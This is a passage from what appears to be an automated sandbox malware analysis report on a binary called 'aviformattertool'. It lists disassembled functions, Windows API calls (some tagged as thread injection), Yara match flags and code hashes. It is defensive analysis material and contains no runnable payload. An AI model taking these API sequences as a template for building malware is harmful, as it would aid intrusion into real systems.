                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                                                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$HandleModuleNameWrite
                                                                                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                          • API String ID: 3784150691-4022980321
                                                                                                                                                          • Opcode ID: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
                                                                                                                                                          • Instruction ID: 15dac176226125f9b152d138cffbac045ff90c6308279214c289240873c3895a
                                                                                                                                                          • Opcode Fuzzy Hash: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
                                                                                                                                                          • Instruction Fuzzy Hash: A731C5B2A012186FEF20E761DE49FDA336CEF81304F1105BBF945B61C0E6B89A548A19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404710 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                                                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                                                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1823725401-0
                                                                                                                                                          • Opcode ID: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
                                                                                                                                                          • Instruction ID: 43c9d50b8e904b77a3a1cd3ef8b41512f2ebbfa3913c6b8dbecc9c9b9a691504
                                                                                                                                                          • Opcode Fuzzy Hash: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
                                                                                                                                                          • Instruction Fuzzy Hash: 0A3102F75442616FD7207FB99C8883BB69CE6C6358712493BFB42F3280D7798C4182A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A21590 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,56FF5638), ref: 02A21630
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A21645
                                                                                                                                                          • ResetEvent.KERNEL32(00000000,56FF5638), ref: 02A2164F
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21684
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,56FF5638), ref: 02A216FA
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A2170F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseEventHandle$CreateOpenReset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1285874450-0
                                                                                                                                                          • Opcode ID: fd48e11fc1b01db84e2cdd57d950770175878aecc4398780447248d502597290
                                                                                                                                                          • Instruction ID: 011f5117e1d0513e2efa118473f1d9395b90714bdd85c58fb240d4d984d39a20
                                                                                                                                                          • Opcode Fuzzy Hash: fd48e11fc1b01db84e2cdd57d950770175878aecc4398780447248d502597290
                                                                                                                                                          • Instruction Fuzzy Hash: BB414371D04358ABDF20CFA8CD84B9DB7B9EF05724F144619E419EB281EB349909CF90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A120AC
                                                                                                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A120CD
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A120D8
                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02A1213E
                                                                                                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02A1217A
                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02A12187
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A121A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1171374749-0
                                                                                                                                                          • Opcode ID: 6085df40319ef519dec7674a41cf439196ff2f3f0ef3347741a48efcf55f758f
                                                                                                                                                          • Instruction ID: 4d1111f785530566e76b3bdc8b011d39da46a9b878aa473df61f3127a5c8680f
                                                                                                                                                          • Opcode Fuzzy Hash: 6085df40319ef519dec7674a41cf439196ff2f3f0ef3347741a48efcf55f758f
                                                                                                                                                          • Instruction Fuzzy Hash: 0A4108B15447059FD311DF25D884A6BBBF9FBC8764F144A1EF89A82250DB30E50ACFA2
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A216A2 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A21E50: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02A216AE,?,?), ref: 02A21E7F
                                                                                                                                                            • Part of subcall function 02A21E50: CloseHandle.KERNEL32(00000000,?,?,02A216AE,?,?), ref: 02A21E94
                                                                                                                                                            • Part of subcall function 02A21E50: SetEvent.KERNEL32(00000000,02A216AE,?,?), ref: 02A21EA7
                                                                                                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,56FF5638), ref: 02A21630
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A21645
                                                                                                                                                          • ResetEvent.KERNEL32(00000000,56FF5638), ref: 02A2164F
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21684
                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 02A216B5
                                                                                                                                                            • Part of subcall function 02A244DA: RaiseException.KERNEL32(?,?,02A1FADF,?,?,?,?,?,?,?,02A1FADF,?,02A40F68,?), ref: 02A2452F
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,56FF5638), ref: 02A216FA
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A2170F
                                                                                                                                                            • Part of subcall function 02A21B90: GetCurrentProcessId.KERNEL32(?), ref: 02A21BE9
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,56FF5638), ref: 02A2171F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2227236058-0
                                                                                                                                                          • Opcode ID: 0dd0bc85fd682741f7128ba41bf093f38b04002d21c4e28914d965fd644b0684
                                                                                                                                                          • Instruction ID: 5a784eb746f097e024bdbc9af0266bb376bc427acf113fb772a89233afe968ae
                                                                                                                                                          • Opcode Fuzzy Hash: 0dd0bc85fd682741f7128ba41bf093f38b04002d21c4e28914d965fd644b0684
                                                                                                                                                          • Instruction Fuzzy Hash: 6C316471D403289BDF20DBE8CD84BADB7B9AF05714F140119E81DEB282EB309909CF61
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A25D14 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __init_pointers.LIBCMT ref: 02A25D14
                                                                                                                                                            • Part of subcall function 02A28482: RtlEncodePointer.NTDLL(00000000), ref: 02A28485
                                                                                                                                                            • Part of subcall function 02A28482: __initp_misc_winsig.LIBCMT ref: 02A284A0
                                                                                                                                                            • Part of subcall function 02A28482: GetModuleHandleW.KERNEL32(kernel32.dll,?,02A41568,00000008,00000003,02A40F4C,?,00000001), ref: 02A29201
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A29215
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02A29228
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02A2923B
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02A2924E
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02A29261
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02A29274
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02A29287
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02A2929A
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02A292AD
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02A292C0
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02A292D3
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02A292E6
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02A292F9
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02A2930C
                                                                                                                                                            • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02A2931F
                                                                                                                                                          • __mtinitlocks.LIBCMT ref: 02A25D19
                                                                                                                                                          • __mtterm.LIBCMT ref: 02A25D22
                                                                                                                                                            • Part of subcall function 02A25D8A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02A288B8
                                                                                                                                                            • Part of subcall function 02A25D8A: _free.LIBCMT ref: 02A288BF
                                                                                                                                                            • Part of subcall function 02A25D8A: RtlDeleteCriticalSection.NTDLL(02A43978), ref: 02A288E1
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 02A25D47
                                                                                                                                                          • __initptd.LIBCMT ref: 02A25D69
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02A25D70
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3567560977-0
                                                                                                                                                          • Opcode ID: eea04c10c3f20094fca64045a79a8e10587fbb7c4c7f3ada1c7523c9e34c710d
                                                                                                                                                          • Instruction ID: 6458b30d60d127598f50976a0b4f6ee7ebe9f4e7ef78c74d66312f0ff8656fb7
                                                                                                                                                          • Opcode Fuzzy Hash: eea04c10c3f20094fca64045a79a8e10587fbb7c4c7f3ada1c7523c9e34c710d
                                                                                                                                                          • Instruction Fuzzy Hash: E3F06D32D993311EE66CBBBE6E4D64A278AEF41B34B600619F460D60C4FF11C84E8951
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A23441 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02A233F3,00000000), ref: 02A2345B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A23462
                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02A2346E
                                                                                                                                                          • RtlDecodePointer.NTDLL(00000001), ref: 02A2348B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                          • String ID: RoInitialize$combase.dll
                                                                                                                                                          • API String ID: 3489934621-340411864
                                                                                                                                                          • Opcode ID: 7cb5da81432f6b5b0e21d75c9656799dbceb63a7be2ab5ce38868d17e9eb0ee2
                                                                                                                                                          • Instruction ID: 747f65862b9fa6b4e84b7cab34d4c7ee125aa0518fea56c9071d5a2c4528947f
                                                                                                                                                          • Opcode Fuzzy Hash: 7cb5da81432f6b5b0e21d75c9656799dbceb63a7be2ab5ce38868d17e9eb0ee2
                                                                                                                                                          • Instruction Fuzzy Hash: 4DE0EDB5DD0350AAEF615F75EC49F0577E9B782B06F008864B502D1194CFBAE06A8F10
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A23516 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02A23430), ref: 02A23530
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A23537
                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02A23542
                                                                                                                                                          • RtlDecodePointer.NTDLL(02A23430), ref: 02A2355D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                                                                          • API String ID: 3489934621-2819208100
                                                                                                                                                          • Opcode ID: b90a7df1b1e539fdc79d50b4d34c0eee2b72296e58d2a0462b0ec6945c55ed8d
                                                                                                                                                          • Instruction ID: 353f0bfdc4a79940804cb41aba4590bdaa172927d6c0262a5a76315e0f1bb880
                                                                                                                                                          • Opcode Fuzzy Hash: b90a7df1b1e539fdc79d50b4d34c0eee2b72296e58d2a0462b0ec6945c55ed8d
                                                                                                                                                          • Instruction Fuzzy Hash: F6E0BFB5DD1304AFEB505F64AD0DB0576A9B782B05F108C64F606D1164DFB9E12ACB10
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A21EB0 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • TlsGetValue.KERNEL32(00000026,56FF5638,?,?,?,?,00000000,02A36A38,000000FF,02A2214A), ref: 02A21EEA
                                                                                                                                                          • TlsSetValue.KERNEL32(00000026,02A2214A,?,?,00000000), ref: 02A21F57
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A21F81
                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 02A21F84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapValue$FreeProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1812714009-0
                                                                                                                                                          • Opcode ID: 2b061c7ad79b0922ac3467387d821f6fdd15a85d68151c679da55e6c6381e2e0
                                                                                                                                                          • Instruction ID: 4fe3230b9259bc1fda9ba1bebbd1af08060f9927c38fbb38e7024dcaff9be501
                                                                                                                                                          • Opcode Fuzzy Hash: 2b061c7ad79b0922ac3467387d821f6fdd15a85d68151c679da55e6c6381e2e0
                                                                                                                                                          • Instruction Fuzzy Hash: 2F51C3759043289FD720CF2CD884B16BBE4FB89764F05865AF86997291DF31EC09CB91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A35600 Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 02A35710
                                                                                                                                                          • __FindPESection.LIBCMT ref: 02A3572A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 876702719-0
                                                                                                                                                          • Opcode ID: fdee466a7e3458b3f1b9c42a8a40b6738dab9da3249431c0bdae190e4ba18f6c
                                                                                                                                                          • Instruction ID: edf162c2a6393a68c84682d1793fd285aba5cb6b232b2762c350231240448ade
                                                                                                                                                          • Opcode Fuzzy Hash: fdee466a7e3458b3f1b9c42a8a40b6738dab9da3249431c0bdae190e4ba18f6c
                                                                                                                                                          • Instruction Fuzzy Hash: BAA17D75E406558FCB22CF5CD981BA9B7B5FB48324F994669EC05AB340EF31E901CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405D6E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringType$ByteCharMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3852931651-0
                                                                                                                                                          • Opcode ID: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
                                                                                                                                                          • Instruction ID: 92337b5d5261d1f7514e6591bcc0141c6486a35b2866982676c545ec12be9aca
                                                                                                                                                          • Opcode Fuzzy Hash: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
                                                                                                                                                          • Instruction Fuzzy Hash: B1416C72540619AFCF109FA4DD85AAF3B69EB08710F10443AF912F2290C3399A619BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02A11CB1
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A11CBA
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(02A47268,00000000), ref: 02A11CC6
                                                                                                                                                          • TerminateThread.KERNEL32(?,00000000), ref: 02A11CD4
                                                                                                                                                          • QueueUserAPC.KERNEL32(02A11E7C,?,00000000), ref: 02A11CE1
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02A11CEC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1946104331-0
                                                                                                                                                          • Opcode ID: 046673b3136bd0f3d8d28b3673eef1de70eed6586efa0f1694da03950bad008c
                                                                                                                                                          • Instruction ID: fc64e151d444290f5a15a3b073812a097aa7480039ef77326918cd0664d0fba3
                                                                                                                                                          • Opcode Fuzzy Hash: 046673b3136bd0f3d8d28b3673eef1de70eed6586efa0f1694da03950bad008c
                                                                                                                                                          • Instruction Fuzzy Hash: FBF0AF71940204BFDB204B9ADD0DC6BFBBCEB86721B00465DF66A82190DF70E921CB60
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403112 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                          • API String ID: 1385375860-4131005785
                                                                                                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                                                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                                                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                                                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A218B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A218FF
                                                                                                                                                            • Part of subcall function 02A22453: std::exception::_Copy_str.LIBCMT ref: 02A2246C
                                                                                                                                                            • Part of subcall function 02A20CD0: __CxxThrowException@8.LIBCMT ref: 02A20D2E
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A2195E
                                                                                                                                                          Strings
                                                                                                                                                          • boost unique_lock owns already the mutex, xrefs: 02A2194D
                                                                                                                                                          • $, xrefs: 02A21963
                                                                                                                                                          • boost unique_lock has no mutex, xrefs: 02A218EE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                                                                          • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                                                                          • API String ID: 2140441600-46888669
                                                                                                                                                          • Opcode ID: 92fa35429e8eecd7e7ed5b922ef39577a2fddaf69338faa8ae4b21521555a448
                                                                                                                                                          • Instruction ID: fd4d894fb0905aafe0a988860eec9b43344859084a609f59e3208fd484f24eec
                                                                                                                                                          • Opcode Fuzzy Hash: 92fa35429e8eecd7e7ed5b922ef39577a2fddaf69338faa8ae4b21521555a448
